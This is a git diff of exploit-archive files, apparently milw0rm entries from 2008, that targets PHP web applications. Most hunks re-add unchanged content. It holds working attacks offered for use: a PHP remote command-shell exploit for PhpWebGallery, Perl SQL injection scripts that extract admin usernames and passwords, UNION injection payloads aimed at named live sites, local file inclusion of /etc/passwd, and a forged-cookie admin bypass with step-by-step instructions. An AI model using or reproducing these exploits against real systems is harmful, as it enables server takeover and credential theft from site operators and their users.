+	print "\nhost....: target server (ip/hostname)";
+	print "\npath....: path to PhpWebGallery directory";
+	print "\nsid.....: a valid admin session id\n";
+	die();
+}
+
+$host = $argv[1];
+$path = $argv[2];
+
+check_target();
+
+$sid = (isset($argv[3])) ? $argv[3] : get_sid();
+
+check_plugin();
+
+$code	 = "0];}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23";
+$packet  = "GET {$path}admin.php?page=plugin§ion=event_tracer/event_list.php&sort={$code} HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Cookie: pwg_id={$sid}\r\n";
+$packet .= "Cmd: %s\r\n";
+$packet .= "Connection: close\r\n\r\n";
+
+while(1)
+{
+	print "\nphpwebgallery-shell# ";
+	$cmd = trim(fgets(STDIN));
+	if ($cmd != "exit")
+	{
+		$response = http_send($host, sprintf($packet, base64_encode($cmd)));
+		preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
+	}
+	else break;
+}
+
+?>
+
+# milw0rm.com [2008-10-14]
diff --git a/platforms/php/webapps/6758.txt b/platforms/php/webapps/6758.txt
index c5a995523..4f2dc1962 100755
--- a/platforms/php/webapps/6758.txt
+++ b/platforms/php/webapps/6758.txt
@@ -1,33 +1,33 @@
-# AstroSPACES (profile.php) SQL
-
-  Powered by Philippine Website Developers and AstroSPACES © P3NET 2006-2007
-#########################################################################
-#
-# AUTHOR : TurkishWarriorr  (Sehitler Ölmez Vatan Bölünmez ....)
-#
-# HOME : http://www.1923turk.org
-#
-#########################################################################
-#
-# DORK : Powered By AstroSPACES
-#
-##########################################################################
-EXPLOIT :
-
-profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--
-
-
-test sites:
-
-http://quirino.com.ph/friendster/profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--
-
-
-E mail login :
-
-http://quirino.com.ph/friendster/space.php?action=memberlist
-
-##########################################################################
-                               www.1923turk.org                    
-                        turkish-warriorr@hotmail.com
-
-# milw0rm.com [2008-10-15]
+# AstroSPACES (profile.php) SQL
+
+  Powered by Philippine Website Developers and AstroSPACES © P3NET 2006-2007
+#########################################################################
+#
+# AUTHOR : TurkishWarriorr  (Sehitler Ölmez Vatan Bölünmez ....)
+#
+# HOME : http://www.1923turk.org
+#
+#########################################################################
+#
+# DORK : Powered By AstroSPACES
+#
+##########################################################################
+EXPLOIT :
+
+profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--
+
+
+test sites:
+
+http://quirino.com.ph/friendster/profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--
+
+
+E mail login :
+
+http://quirino.com.ph/friendster/space.php?action=memberlist
+
+##########################################################################
+                               www.1923turk.org                    
+                        turkish-warriorr@hotmail.com
+
+# milw0rm.com [2008-10-15]
diff --git a/platforms/php/webapps/6759.txt b/platforms/php/webapps/6759.txt
index 4edd3ead3..2016b6f35 100755
--- a/platforms/php/webapps/6759.txt
+++ b/platforms/php/webapps/6759.txt
@@ -1,110 +1,110 @@
-# myStats (hits.php) Multiple Remote Vulnerabilities Exploit
-# url: http://mywebland.com/
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-#
-# Greetz To: All Hackers and milw0rm website
-
----------------------
-Break System Block IP
----------------------
-
-<>
-
-7: if (@getenv("HTTP_X_FORWARDED_FOR")) 
-
-   { $u_ip = @getenv("HTTP_X_FORWARDED_FOR"); } 
-
-   else { $u_ip = @getenv("REMOTE_ADDR"); } 
-
-
-
-   if ($u_ip == BLOCK_IP) 
-
-    { return 1; 
-
-13:  exit; } 
-
-<>
-
-11: define("BLOCK_IP", "127.0.0.1"); 
-
-<>
-
-use HTTP::Request;
-use LWP::UserAgent;
-
-my $web="http://localhost/hits.php";
-my $ua=LWP::UserAgent->new();
-$ua->default_header('X-Forwarded-For' => "127.1.1.1");
-my $respuesta=HTTP::Request->new(GET=>$web);
-$ua->timeout(30);
-my $response=$ua->request($respuesta);
-$contenido=$response->content;
-if ($response->is_success)
-{
-open(FILE,">>results.txt");
-print FILE "$contenido\n";
-close(FILE);
-print "\n[+] Exploit Succesful!\n\n";
-}
-else
-{
-print "\n[-] Exploit Failed!\n\n";
-}
-
-<>
-
-$ua->default_header('X-Forwarded-For' => "127.1.1.1"); --> BREAK BLOCK_IP
-
--------------
-SQL Injection
--------------
-
-<>
-
-63: if (isset($_GET['sortby']))
-
-    {$sortby = $_GET['sortby'];}
-
-    else
-
-    { $sortby =  'timestamp' ;}
-
-
-    $sql = "SELECT * FROM " . LOG_TBL . " ORDER BY " . $sortby." DESC LIMIT 0, ". DISPLAY_LOG_NO ;
-
-69: $querylog = mysql_query($sql) or die("Line 117 Cannot query the database.
    " . mysql_error());
-
-<>
-
-use HTTP::Request;
-use LWP::UserAgent;
-
-my $web="http://localhost/hits.php?sortby=1'";
-my $ua=LWP::UserAgent->new();
-my $respuesta=HTTP::Request->new(GET=>$web);
-$ua->timeout(30);
-my $response=$ua->request($respuesta);
-$contenido=$response->content;
-if ($response->is_success)
-{
-if($contenido =~ /You have an error in your SQL syntax;/)
-{
-print "\n[+] Exploit Succesful!\n";
-print "\n[+] Content:\n";
-print "$contenido\n\n";
-}
-}
-else
-{
-print "\n[-] Exploit Failed!\n\n";
-}
-
-# milw0rm.com [2008-10-15]
+# myStats (hits.php) Multiple Remote Vulnerabilities Exploit
+# url: http://mywebland.com/
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+#
+# Greetz To: All Hackers and milw0rm website
+
+---------------------
+Break System Block IP
+---------------------
+
+<>
+
+7: if (@getenv("HTTP_X_FORWARDED_FOR")) 
+
+   { $u_ip = @getenv("HTTP_X_FORWARDED_FOR"); } 
+
+   else { $u_ip = @getenv("REMOTE_ADDR"); } 
+
+
+
+   if ($u_ip == BLOCK_IP) 
+
+    { return 1; 
+
+13:  exit; } 
+
+<>
+
+11: define("BLOCK_IP", "127.0.0.1"); 
+
+<>
+
+use HTTP::Request;
+use LWP::UserAgent;
+
+my $web="http://localhost/hits.php";
+my $ua=LWP::UserAgent->new();
+$ua->default_header('X-Forwarded-For' => "127.1.1.1");
+my $respuesta=HTTP::Request->new(GET=>$web);
+$ua->timeout(30);
+my $response=$ua->request($respuesta);
+$contenido=$response->content;
+if ($response->is_success)
+{
+open(FILE,">>results.txt");
+print FILE "$contenido\n";
+close(FILE);
+print "\n[+] Exploit Succesful!\n\n";
+}
+else
+{
+print "\n[-] Exploit Failed!\n\n";
+}
+
+<>
+
+$ua->default_header('X-Forwarded-For' => "127.1.1.1"); --> BREAK BLOCK_IP
+
+-------------
+SQL Injection
+-------------
+
+<>
+
+63: if (isset($_GET['sortby']))
+
+    {$sortby = $_GET['sortby'];}
+
+    else
+
+    { $sortby =  'timestamp' ;}
+
+
+    $sql = "SELECT * FROM " . LOG_TBL . " ORDER BY " . $sortby." DESC LIMIT 0, ". DISPLAY_LOG_NO ;
+
+69: $querylog = mysql_query($sql) or die("Line 117 Cannot query the database.
    " . mysql_error());
+
+<>
+
+use HTTP::Request;
+use LWP::UserAgent;
+
+my $web="http://localhost/hits.php?sortby=1'";
+my $ua=LWP::UserAgent->new();
+my $respuesta=HTTP::Request->new(GET=>$web);
+$ua->timeout(30);
+my $response=$ua->request($respuesta);
+$contenido=$response->content;
+if ($response->is_success)
+{
+if($contenido =~ /You have an error in your SQL syntax;/)
+{
+print "\n[+] Exploit Succesful!\n";
+print "\n[+] Content:\n";
+print "$contenido\n\n";
+}
+}
+else
+{
+print "\n[-] Exploit Failed!\n\n";
+}
+
+# milw0rm.com [2008-10-15]
diff --git a/platforms/php/webapps/6760.txt b/platforms/php/webapps/6760.txt
index 2e380afae..4fdf5f762 100755
--- a/platforms/php/webapps/6760.txt
+++ b/platforms/php/webapps/6760.txt
@@ -1,27 +1,27 @@
-# myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability
-# url: http://mywebland.com/
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-#
-# Greetz To: All Hackers and milw0rm website
-
-vuln file: /viewevent.php
-vuln code:
-43: if (isset($_GET['eventdate']))
-xx: ...
-93: $sql = "SELECT  * FROM event WHERE  date = '$eventdate'" ;
-
-94: $results = mysql_query($sql) or die("Cannot query the database.
    " . mysql_error());
-
-95: $event  = mysql_num_rows($results);
-
-PoC:     /viewevent.php?eventdate='[foo]
-Exploit: /viewevent.php?eventdate='+union+all+select+1,1,concat(user(),char(32,35),database(),char(32,35),version())/*
-
-# milw0rm.com [2008-10-15]
+# myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability
+# url: http://mywebland.com/
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+#
+# Greetz To: All Hackers and milw0rm website
+
+vuln file: /viewevent.php
+vuln code:
+43: if (isset($_GET['eventdate']))
+xx: ...
+93: $sql = "SELECT  * FROM event WHERE  date = '$eventdate'" ;
+
+94: $results = mysql_query($sql) or die("Cannot query the database.
    " . mysql_error());
+
+95: $event  = mysql_num_rows($results);
+
+PoC:     /viewevent.php?eventdate='[foo]
+Exploit: /viewevent.php?eventdate='+union+all+select+1,1,concat(user(),char(32,35),database(),char(32,35),version())/*
+
+# milw0rm.com [2008-10-15]
diff --git a/platforms/php/webapps/6762.txt b/platforms/php/webapps/6762.txt
index 750f87abf..619ce1e55 100755
--- a/platforms/php/webapps/6762.txt
+++ b/platforms/php/webapps/6762.txt
@@ -1,50 +1,50 @@
-   ___________________________________________________________________________________________________________
-  |  _          __  ___  ___ __________________     ___  ___ ____  ______  __  ___ _________________ _______  |
-  | | |        / / /  / /  //_______   _______/    /  / /  //    ||  ____||  |/  //     ___________//       \ |
-  | | |  ^    / / /  /_/  /  /__/  /  /___    ___ /  /_/  //     ||  |    |  v  //     /___        /    O   / |
-  | | | / \  / / /   _   /  /  /  /  ____/   /__//  __   //  /|  ||  |    |     \\    ____/       /        /  |
-  | | |/   \/ / /  / /  /  /  /  /  /_______    /  / /  //  /_|  ||  |___ |  |\  \\  /__________ /    /\   \  | 
-  | | /  /\  / /__/ /__/  /__/  /__________/   /__/ /__//________||______||__| \__\\___________//____/  \___\ | 
-  | |   /  \/                                                                                                 | 
-  | |  / _____________________________________________________________________________________________________|
-  | | / /                            .: CafeEngine Multipe remote SQL Injection :.                            | 
-  | |/ /______________________________________________________________________________________________________|
-  | v / Discoverd By:  0xFFFFFF                            . Main THX: ALLAH                                  |
-  |  /  Home:          www.white-hacker.com                . Greetz To: All Hackers & WHITE-HACKER Team       | 
-  | /   Mail:          admin(at)white-hacker[dot]com       .                                                  |
-  |/    Country:       Algeria                             .                                                  |
-  v___________________________________________________________________________________________________________|
-  |     Publication info :.                                                                                   |
-  |___________________________________________________________________________________________________________|
-  |     Date:          19-09-2008                          . Method   :         [*] GET   [ ] POST            |
-  |     Content:       Vulnerability                       . Register Globals : [ ] ON    [*] OFF             |
-  |     Type:          SQL injection                       . Magic quotes :     [*] ON    [ ] OFF             | 
-  |     Application:   Easy-Cafeengine / Cafeengine        . Risk:              [*] High  [ ] medium  [ ] Low | 
-  |     Venedor site:  http://cafeengine.com/              .                                                  | 
-  |     Version:       N/A                                 .                                                  |
-  |     Impact:        Exploring Database                  .                                                  |
-  |     Exploit:       Available                           .                                                  |
-  |     Fix:           N/A                                 .                                                  |
-  |___________________________________________________________________________________________________________|
-  | Description :.                                                                                            |
-  |___________________________________________________________________________________________________________|
-  | Input "id" passed into dish.php,menu.php pages is not properly verified,                                  | 
-  | a visitor can easily get sensitive information from the database by injecting SQL Querys                  |
-  | ......................................................................................................... |
-  |                                                                                                           |
-  | CafeEngine Exploit :                                                                                      | 
-  | [Site]dish.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10                                            |
-  | [Site]menu.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12                                      |
-  |                                                                                                           | 
-  | Easy-CafeEngine Exploit:                                                                                  | 
-  | [Site]index.php?itemid=-1+union+select+1,2,3,version(),5,6,7,8,9                                          |
-  |___________________________________________________________________________________________________________|
-  | Notice :.                                                                                                 |
-  |___________________________________________________________________________________________________________|
-  | These publications are published for educational purpose thus the author will be not responsible          |
-  | for any damage.                                                                                           |
-  |___________________________________________________________________________________________________________|
-                                                \  © WHITE-HACKER  All contents © 2008. All rights reserved.  |
-                                                 \____________________________________________________________|
-
-# milw0rm.com [2008-10-16]
+   ___________________________________________________________________________________________________________
+  |  _          __  ___  ___ __________________     ___  ___ ____  ______  __  ___ _________________ _______  |
+  | | |        / / /  / /  //_______   _______/    /  / /  //    ||  ____||  |/  //     ___________//       \ |
+  | | |  ^    / / /  /_/  /  /__/  /  /___    ___ /  /_/  //     ||  |    |  v  //     /___        /    O   / |
+  | | | / \  / / /   _   /  /  /  /  ____/   /__//  __   //  /|  ||  |    |     \\    ____/       /        /  |
+  | | |/   \/ / /  / /  /  /  /  /  /_______    /  / /  //  /_|  ||  |___ |  |\  \\  /__________ /    /\   \  | 
+  | | /  /\  / /__/ /__/  /__/  /__________/   /__/ /__//________||______||__| \__\\___________//____/  \___\ | 
+  | |   /  \/                                                                                                 | 
+  | |  / _____________________________________________________________________________________________________|
+  | | / /                            .: CafeEngine Multipe remote SQL Injection :.                            | 
+  | |/ /______________________________________________________________________________________________________|
+  | v / Discoverd By:  0xFFFFFF                            . Main THX: ALLAH                                  |
+  |  /  Home:          www.white-hacker.com                . Greetz To: All Hackers & WHITE-HACKER Team       | 
+  | /   Mail:          admin(at)white-hacker[dot]com       .                                                  |
+  |/    Country:       Algeria                             .                                                  |
+  v___________________________________________________________________________________________________________|
+  |     Publication info :.                                                                                   |
+  |___________________________________________________________________________________________________________|
+  |     Date:          19-09-2008                          . Method   :         [*] GET   [ ] POST            |
+  |     Content:       Vulnerability                       . Register Globals : [ ] ON    [*] OFF             |
+  |     Type:          SQL injection                       . Magic quotes :     [*] ON    [ ] OFF             | 
+  |     Application:   Easy-Cafeengine / Cafeengine        . Risk:              [*] High  [ ] medium  [ ] Low | 
+  |     Venedor site:  http://cafeengine.com/              .                                                  | 
+  |     Version:       N/A                                 .                                                  |
+  |     Impact:        Exploring Database                  .                                                  |
+  |     Exploit:       Available                           .                                                  |
+  |     Fix:           N/A                                 .                                                  |
+  |___________________________________________________________________________________________________________|
+  | Description :.                                                                                            |
+  |___________________________________________________________________________________________________________|
+  | Input "id" passed into dish.php,menu.php pages is not properly verified,                                  | 
+  | a visitor can easily get sensitive information from the database by injecting SQL Querys                  |
+  | ......................................................................................................... |
+  |                                                                                                           |
+  | CafeEngine Exploit :                                                                                      | 
+  | [Site]dish.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10                                            |
+  | [Site]menu.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12                                      |
+  |                                                                                                           | 
+  | Easy-CafeEngine Exploit:                                                                                  | 
+  | [Site]index.php?itemid=-1+union+select+1,2,3,version(),5,6,7,8,9                                          |
+  |___________________________________________________________________________________________________________|
+  | Notice :.                                                                                                 |
+  |___________________________________________________________________________________________________________|
+  | These publications are published for educational purpose thus the author will be not responsible          |
+  | for any damage.                                                                                           |
+  |___________________________________________________________________________________________________________|
+                                                \  © WHITE-HACKER  All contents © 2008. All rights reserved.  |
+                                                 \____________________________________________________________|
+
+# milw0rm.com [2008-10-16]
diff --git a/platforms/php/webapps/6763.txt b/platforms/php/webapps/6763.txt
index f71dc310f..0776f1ff9 100755
--- a/platforms/php/webapps/6763.txt
+++ b/platforms/php/webapps/6763.txt
@@ -1,21 +1,21 @@
- Mosaic Commerce SQL Injection Vulnerability
-Discovered By Ali Abbasi[abbasi[At]ustmb.ac.ir]
-Mazandaran University Of Science And Technology
-Network Security Research Center
-Babol, Iran
-http://cyber-defence.com
-Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )
- 
- 
-  {SQL BUG}
-  /mosaic-path/category.php?cid=[SQL]
- 
-  Exploit For Get Admin Username And Password Hash:
-  category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*
- 
-
-Example:
-
-http://www.coppermax.com/category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*
-
-# milw0rm.com [2008-10-16]
+ Mosaic Commerce SQL Injection Vulnerability
+Discovered By Ali Abbasi[abbasi[At]ustmb.ac.ir]
+Mazandaran University Of Science And Technology
+Network Security Research Center
+Babol, Iran
+http://cyber-defence.com
+Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )
+ 
+ 
+  {SQL BUG}
+  /mosaic-path/category.php?cid=[SQL]
+ 
+  Exploit For Get Admin Username And Password Hash:
+  category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*
+ 
+
+Example:
+
+http://www.coppermax.com/category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*
+
+# milw0rm.com [2008-10-16]
diff --git a/platforms/php/webapps/6764.php b/platforms/php/webapps/6764.php
index 4694054d5..aaad6eb91 100755
--- a/platforms/php/webapps/6764.php
+++ b/platforms/php/webapps/6764.php
@@ -1,247 +1,247 @@
-#!/usr/bin/php -q
-
-
-# milw0rm.com [2008-10-16]
+#!/usr/bin/php -q
+
+
+# milw0rm.com [2008-10-16]
diff --git a/platforms/php/webapps/6765.txt b/platforms/php/webapps/6765.txt
index 114a7fc2e..4cc8ddd61 100755
--- a/platforms/php/webapps/6765.txt
+++ b/platforms/php/webapps/6765.txt
@@ -1,61 +1,61 @@
-# IP Reg <= 0.4 Multiple Remote SQL Injection Vulnerabilities
-# url: http://sourceforge.net/projects/ipreg/
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-#
-# Greetz To: All Hackers and milw0rm website
-
--------------------------
-
-vuln file: /locationdel.php
-vuln code:
-27: $location_id = $_GET['location_id'];
-xx: ...
-42: $result = mysql_query("SELECT location_name FROM location WHERE location_id='$location_id'") or die(mysql_error());
-
-PoC:     /locationdel.php?location_id='[foo]
-Exploit: /locationdel.php?location_id='+union+all+select+concat(user_name,char(58),user_pass)+from+user/*
-
--------------------------
-
-vuln file: /vlanview.php
-vuln code:
-27: $vlan_id = $_GET['vlan_id'];
-xx: ...
-42: $result = mysql_query("SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error
-    ());
-
-PoC:     /vlanview.php?vlan_id='[foo]
-Exploit: /vlanview.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*
-
--------------------------
-
-vuln file: /vlanedit.php
-vuln code:
-27: $vlan_id = $_GET['vlan_id'];
-xx: ...
-42: $result = mysql_query("SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error
-    ());
-
-PoC:     /vlanedit.php?vlan_id='[foo]
-Exploit: /vlanedit.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*
-
--------------------------
-
-vuln file: /vlandel.php
-vuln code:
-27: $vlan_id = $_GET['vlan_id'];
-xx: ...
-42: $result = mysql_query("SELECT vlan_id, vlan_name, vlan_number FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error
-    ());
-
-PoC:     /vlandel.php?vlan_id='[foo]
-Exploit: /vlandel.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*
-
-# milw0rm.com [2008-10-16]
+# IP Reg <= 0.4 Multiple Remote SQL Injection Vulnerabilities
+# url: http://sourceforge.net/projects/ipreg/
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+#
+# Greetz To: All Hackers and milw0rm website
+
+-------------------------
+
+vuln file: /locationdel.php
+vuln code:
+27: $location_id = $_GET['location_id'];
+xx: ...
+42: $result = mysql_query("SELECT location_name FROM location WHERE location_id='$location_id'") or die(mysql_error());
+
+PoC:     /locationdel.php?location_id='[foo]
+Exploit: /locationdel.php?location_id='+union+all+select+concat(user_name,char(58),user_pass)+from+user/*
+
+-------------------------
+
+vuln file: /vlanview.php
+vuln code:
+27: $vlan_id = $_GET['vlan_id'];
+xx: ...
+42: $result = mysql_query("SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error
+    ());
+
+PoC:     /vlanview.php?vlan_id='[foo]
+Exploit: /vlanview.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*
+
+-------------------------
+
+vuln file: /vlanedit.php
+vuln code:
+27: $vlan_id = $_GET['vlan_id'];
+xx: ...
+42: $result = mysql_query("SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error
+    ());
+
+PoC:     /vlanedit.php?vlan_id='[foo]
+Exploit: /vlanedit.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*
+
+-------------------------
+
+vuln file: /vlandel.php
+vuln code:
+27: $vlan_id = $_GET['vlan_id'];
+xx: ...
+42: $result = mysql_query("SELECT vlan_id, vlan_name, vlan_number FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error
+    ());
+
+PoC:     /vlandel.php?vlan_id='[foo]
+Exploit: /vlandel.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*
+
+# milw0rm.com [2008-10-16]
diff --git a/platforms/php/webapps/6766.txt b/platforms/php/webapps/6766.txt
index c03d52ac0..76651c879 100755
--- a/platforms/php/webapps/6766.txt
+++ b/platforms/php/webapps/6766.txt
@@ -1,45 +1,45 @@
-**************************************************************************************
-
-Author : DaRkLiFe
-Greetz : str0ke & S.W.A.T. & funkys0ul
-
-**************************************************************************************
-Script   :
-
-PokerMax Poker League Insecure Cookie Handling Vulnerability
-
-Download:
-
-http://www.stevedawson.com/downloads/pokerleague.zip
-**************************************************************************************
-
-Exploit :
-
-javascript:document.cookie = "ValidUserAdmin=admin";
-
-**here "admin" refers to username of administrator on site
-
-default username is "admin" given after installation of site
-
-but if it is changed u can easily find out username of admin and then 
-substitute it in place of "admin"
-**************************************************************************************
-
-Instructions :
-
-Find the site running on this script .
-
-Go to http://site.com/pokerleague/pokeradmin/configure.php
-
-It will ask for login. Now in url tab run the exploit command
-
-Then return back to http://site.com/pokerleague/pokeradmin/configure.php
-
-Now u should be loggedin as admin and change the thing into what you want .
-
-**************************************************************************************
-
-THANKS ! GREETZ ! HAPPY DIWALI !
-**************************************************************************************
-
-# milw0rm.com [2008-10-16]
+**************************************************************************************
+
+Author : DaRkLiFe
+Greetz : str0ke & S.W.A.T. & funkys0ul
+
+**************************************************************************************
+Script   :
+
+PokerMax Poker League Insecure Cookie Handling Vulnerability
+
+Download:
+
+http://www.stevedawson.com/downloads/pokerleague.zip
+**************************************************************************************
+
+Exploit :
+
+javascript:document.cookie = "ValidUserAdmin=admin";
+
+**here "admin" refers to username of administrator on site
+
+default username is "admin" given after installation of site
+
+but if it is changed u can easily find out username of admin and then 
+substitute it in place of "admin"
+**************************************************************************************
+
+Instructions :
+
+Find the site running on this script .
+
+Go to http://site.com/pokerleague/pokeradmin/configure.php
+
+It will ask for login. Now in url tab run the exploit command
+
+Then return back to http://site.com/pokerleague/pokeradmin/configure.php
+
+Now u should be loggedin as admin and change the thing into what you want .
+
+**************************************************************************************
+
+THANKS ! GREETZ ! HAPPY DIWALI !
+**************************************************************************************
+
+# milw0rm.com [2008-10-16]
diff --git a/platforms/php/webapps/6767.txt b/platforms/php/webapps/6767.txt
index 6fa203f22..1fc24fd28 100755
--- a/platforms/php/webapps/6767.txt
+++ b/platforms/php/webapps/6767.txt
@@ -1,26 +1,26 @@
-# Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability
-# url: http://code.google.com/p/kure/downloads/list
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-#
-# *Requirements: magic_quotes_gpc = Off
-
-LFI /etc/passwd:
-/?post=../../../../../../../../../../../../../etc/passwd%00
-/?doc=../../../../../../../../../../../../../etc/passwd%00
-
-LFI /config.php:
-/?post=../config.php%00
-/?doc=../config.php%00
-
-dork: "powered by kure"
-
-have fun :D
-
-# milw0rm.com [2008-10-16]
+# Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability
+# url: http://code.google.com/p/kure/downloads/list
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+#
+# *Requirements: magic_quotes_gpc = Off
+
+LFI /etc/passwd:
+/?post=../../../../../../../../../../../../../etc/passwd%00
+/?doc=../../../../../../../../../../../../../etc/passwd%00
+
+LFI /config.php:
+/?post=../config.php%00
+/?doc=../config.php%00
+
+dork: "powered by kure"
+
+have fun :D
+
+# milw0rm.com [2008-10-16]
diff --git a/platforms/php/webapps/6768.txt b/platforms/php/webapps/6768.txt
index 212bb6101..0be4dc4c3 100755
--- a/platforms/php/webapps/6768.txt
+++ b/platforms/php/webapps/6768.txt
@@ -1,136 +1,136 @@
-
-
-# milw0rm.com [2008-10-16]
+
+
+# milw0rm.com [2008-10-16]
diff --git a/platforms/php/webapps/6769.pl b/platforms/php/webapps/6769.pl
index 86ec8fc22..0aee7f5b5 100755
--- a/platforms/php/webapps/6769.pl
+++ b/platforms/php/webapps/6769.pl
@@ -1,60 +1,60 @@
-#!/usr/bin/perl 
-# -----------------------------------------------------
-# iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit
-# By StAkeR aka athos - StAkeR[at]hotmail[dot]it
-# On 16/10/2008
-# http://www.igamingcms.com/iGaming_2_Alpha.zip
-# -----------------------------------------------------
-
-use strict;
-use LWP::UserAgent;
-
-
-my ($host,$id) = @ARGV;
-
-usage() unless $host =~ /http:\/\/(.+?)$/ and $id =~ /^[0-9]/;
-
-my $etc = "' union select 1,concat(0x616E6172636879,".
-          "password,0x3a,username,0x616E6172636879),3".
-          ",4,5 from sp_users where id=$id#";
-          
-my @search = ($etc,'all',0,'Search','search_games');          
-my @split = undef;          
-          
-my $http = new LWP::UserAgent;
-my $post = $http->post($host.'/search.php',
-                      [
-                       keywords => $search[0],
-                       platform => $search[1],
-                       exact    => $search[2],
-                       submit   => $search[3],
-                       do       => $search[4]
-                     ]);
-                     
-if($post->is_success)
-{
-  if($post->as_string =~ /anarchy(.+?)anarchy/)
-  {
-    @split = split(':',$1);
-    
-    print "Username: $split[0]\r\n";
-    print "Password: $split[1]\r\n";
-  }
-  else
-  {
-    print "Exploit Failed!\r\n";
-  }
-}
-
-sub usage
-{
-  print "iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit\r\n";
-  print "Usage: perl $0 http://[host] [user_id]\r\n";
-  exit;
-}
-
-
-            
-__END__         
-
-# milw0rm.com [2008-10-16]
+#!/usr/bin/perl 
+# -----------------------------------------------------
+# iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit
+# By StAkeR aka athos - StAkeR[at]hotmail[dot]it
+# On 16/10/2008
+# http://www.igamingcms.com/iGaming_2_Alpha.zip
+# -----------------------------------------------------
+
+use strict;
+use LWP::UserAgent;
+
+
+my ($host,$id) = @ARGV;
+
+usage() unless $host =~ /http:\/\/(.+?)$/ and $id =~ /^[0-9]/;
+
+my $etc = "' union select 1,concat(0x616E6172636879,".
+          "password,0x3a,username,0x616E6172636879),3".
+          ",4,5 from sp_users where id=$id#";
+          
+my @search = ($etc,'all',0,'Search','search_games');          
+my @split = undef;          
+          
+my $http = new LWP::UserAgent;
+my $post = $http->post($host.'/search.php',
+                      [
+                       keywords => $search[0],
+                       platform => $search[1],
+                       exact    => $search[2],
+                       submit   => $search[3],
+                       do       => $search[4]
+                     ]);
+                     
+if($post->is_success)
+{
+  if($post->as_string =~ /anarchy(.+?)anarchy/)
+  {
+    @split = split(':',$1);
+    
+    print "Username: $split[0]\r\n";
+    print "Password: $split[1]\r\n";
+  }
+  else
+  {
+    print "Exploit Failed!\r\n";
+  }
+}
+
+sub usage
+{
+  print "iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit\r\n";
+  print "Usage: perl $0 http://[host] [user_id]\r\n";
+  exit;
+}
+
+
+            
+__END__         
+
+# milw0rm.com [2008-10-16]
